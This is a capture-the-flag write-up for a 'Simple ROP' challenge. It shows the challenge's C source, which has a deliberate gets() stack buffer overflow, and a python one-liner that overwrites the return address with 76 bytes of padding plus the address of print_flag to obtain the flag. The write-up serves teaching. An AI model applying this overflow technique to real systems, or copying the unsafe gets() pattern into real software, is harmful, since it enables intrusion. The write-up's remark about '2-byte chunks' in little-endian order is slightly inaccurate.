Rating:

# Simple ROP - 120 Points

### Solution

###### Writeup by VoidMercy from phsst

We were given a binary and it's source code.


#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

void print_flag();
void what_did_you_say();

int main(int argc, char* argv[])
{
gid_t gid = getegid();
setresgid(gid, gid, gid);
what_did_you_say();
return 0;
}

void print_flag()
{
system("cat flag.txt");
}

void what_did_you_say()
{
char buff[64];
gets(buff);
printf("You said: %s\n", buff);
}


As the problem name suggests, this is a problem that uses ROP. We can see that we have to call the function print_flag() to get the flag, so we first get the address of this function with:

>objdump -d simplerop | grep "print_flag"

We find the address of print_flag to be: 0x804851a

Then, we have to find out the number of characters until we gain control of eip through the return address. Afterwards we append the address of print_flag() in little endian order (reversed order in chunks of 2 bytes), then pipe the input through python (to print the non printable ascii characters).


python -c 'print "A"*64+"\x1a\x85\x04\x08"' | ./simple-rop #NO SEG FAULT, NOT ENOUGH CHARACTERS

python -c 'print "A"*76+"\x1a\x85\x04\x08"' | ./simple-rop #GOT THE FLAG! 76 IS A PRETTY COMMON SIZE FOR AN ARRAY OF 64 CHARS


## Flag

>easyctf{r0p_7o_v1ct0ry}

Original writeup (https://github.com/VoidMercy/EasyCTF-Writeups-2017/tree/master/binexploit/Simple%20ROP).